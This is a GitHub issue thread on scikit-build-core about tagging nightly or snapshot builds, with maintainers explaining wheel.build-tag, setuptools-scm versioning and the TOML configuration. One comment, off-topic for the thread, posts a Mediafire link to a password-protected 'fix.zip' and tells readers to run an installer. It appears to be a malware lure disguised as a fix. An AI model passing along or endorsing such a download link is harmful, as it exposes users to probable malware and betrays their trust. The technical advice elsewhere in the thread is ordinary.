### ISSUE TITLE
Injecting snapshot release information externally

### ISSUE THREAD

**Issue by alexreinking** [scikit-build/scikit-build-core#877]
With `setuptools` it is possible to set a development tag and build number via:

```
egg_info -b.dev${TIMESTAMP} --build-number ${CI_BUILD_NUMBER}
```

See the docs here: https://setuptools.pypa.io/en/latest/userguide/distribution.html#tagging-and-daily-build-or-snapshot-releases

----

What are the best practices for building nightly releases and uploading them to Test PyPI using scikit-build-core?

**Comment by henryiii** [comment]
You can set the build number with the `wheel.build-tag` option. But you can't change the version - this can't be reliably done since it's sometimes part of the pyproject.toml, and sometimes in one or more places in files. You can use the `wheel tags` command of `wheel` to change the build tag afterwards, as well.

If you use scm versioning, you can have a differing version number for each commit. You can also write a custom version plugin that takes an environment variable or similar.

**Comment by LecrisUT** [comment]
I would say instead the best practices for nightly would be to have the user call `pip install https://github.com/....`, but yeah if you want to publish nightly builds just letting `setuptool-scm` format your version with the default [`guess-next-dev`](https://setuptools-scm.readthedocs.io/en/latest/extending/#available-implementations) should be fine. Although probably it would be better to upload to main PyPI in that case as well.

**Comment by henryiii** [comment]
For https://anaconda.org/scientific-python-nightly-wheels, I believe they all just have `.dev0`, and each upload wipes the last one?

**Comment by alexreinking** [comment]
> For https://anaconda.org/scientific-python-nightly-wheels, I believe they all just have `.dev0`, and each upload wipes the last one?

I thought you couldn't wipe a previous upload on Test PyPI? It follows the same write-only policies that the real PyPI does.

**Comment by alexreinking** [comment]
@LecrisUT -- how does `setuptools-scm` work with `scikit-build-core`, which isn't setuptools-based?

**Comment by LecrisUT** [comment]
> @LecrisUT -- how does `setuptools-scm` work with `scikit-build-core`, which isn't setuptools-based?

All of them use `setuptools-scm`, even `hatch-vcs`. As for the configuration: https://scikit-build-core.readthedocs.io/en/latest/configuration.html#dynamic-metadata

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by henryiii** [comment]
I'd assume the anaconda cheeseshop doesn't have this policy enabled? I'm not very familiar with Anaconda's wheel hosting.

And:

```toml
[tool.scikit-build]
metadata.version.provider = "scikit_build_core.metadata.setuptools_scm"

[tool.setuptools_scm]  # Section required
```

Plus usually writing it to a file, either via setuptools_scm or `tool.scikit-build.generate`.

**Comment by alexreinking** [comment]
Thanks very much @henryiii  and @LecrisUT -- I'll try your suggestions and re-open if not resolved 🙂
